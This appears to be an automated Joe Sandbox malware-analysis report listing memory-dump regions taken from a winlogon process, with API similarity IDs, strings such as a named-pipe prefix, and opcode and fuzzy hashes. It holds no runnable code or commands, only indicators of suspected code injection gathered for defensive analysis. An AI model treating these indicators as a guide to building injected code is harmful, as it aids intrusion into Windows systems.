• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
APIs
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: displacement map'$csm$f
• API String ID: 3242871069-3478954885
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: displacement map'$csm$f
• API String ID: 3242871069-3478954885
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
• Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
Strings
Memory Dump Source
• Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
• Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CallEncodePointerTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3544855599-2084237596
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CallEncodePointerTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3544855599-2084237596
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID: pid_
                                                                  • API String ID: 517849248-4147670505
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID: pid_
                                                                  • API String ID: 517849248-4147670505
                                                                  • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction ID: 07f90da04163dc3b659dd41bba0112b6b973e66babdd7fa66952a63cce6603ae
                                                                  • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction Fuzzy Hash: 1211842931CF66B1FB50D7ADE80939972A0F744B92F9081719E4A93B94EF38C945C740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                  • String ID:
                                                                  • API String ID: 2718003287-0
                                                                  • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction ID: aa7b0206ff3034d73e68d8f770ffb95cbc7ed05fd63c629f7674de48f24b2dcd
                                                                  • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction Fuzzy Hash: 97D12176B04E90AAEB12CFF9D44839C37B1FB54B99F408216CE5997BD9CA34C44AC741
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                  • String ID:
                                                                  • API String ID: 2718003287-0
                                                                  • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction ID: 57ee99270b9c1eaf48f50f5fff10c1dcedfced4da08985b2ef85061a5fb2925f
                                                                  • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction Fuzzy Hash: B8D1F136B24E90A9E712CFFDD44839C37B1F354B99F248216CE5A97B99DA34C44AC740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction ID: d198d0402c3cd64bf19a3c42572fc19e99f05a35975699a57ecc9879073096a2
                                                                  • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction Fuzzy Hash: 30011E3A610EA0D6D744DFEAE80C25AB7A1FB88F82F448425EB8A5775ADE38C455C740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction ID: ae5a94581dd254dcea49812c76861850ded1eacc24209e508c0d2b977c515518
                                                                  • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction Fuzzy Hash: AD01213A614EA0D6D754DFEEE80815AB7A1F788F82F148425EF4A53B19DF38C455C740
                                                                  APIs
                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC682D9B), ref: 00000225DC682ECC
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC682D9B), ref: 00000225DC682F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastMode
                                                                  • String ID:
                                                                  • API String ID: 953036326-0
                                                                  • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction ID: 3c1f05aba021795ff7175e063720aa5e6c5463a2587f973e92fd774eacd69bd0
                                                                  • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction Fuzzy Hash: C191E77A710E70A5F762DFAD94883AD2BA0FB44B8AF54C119DE0A67BC5DB34C446C702
                                                                  APIs
                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC652D9B), ref: 00000225DC652ECC
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC652D9B), ref: 00000225DC652F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastMode
                                                                  • String ID:
                                                                  • API String ID: 953036326-0
                                                                  • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction ID: 6abb4479ed5ce15c474aeea384350e77a5f7a21677473c94f47e63f0f9e8d521
                                                                  • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction Fuzzy Hash: 5891C57A720E70A5F7629FED94883AD3BA0F744F8AF248119DE0A57B95DB35C486C700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction ID: e5c13c2da8d7d5dbcbc508a7cc06e0c60fad03daceb6359ca316b1c5a3530366
                                                                  • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction Fuzzy Hash: 21115E2A714F109AEF00CFA4E8593A833A4F719759F440E21DB6D4A7A4DF78C1A8C381
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction ID: 15406291821e2fe318be73519a99bbba27e0b2cf66864646268de93d0c853935
                                                                  • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction Fuzzy Hash: 4D115E2A754F109AEF00CFE4E8593A933A4F719769F440E21DB6D867A4DF78C1A8C380
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
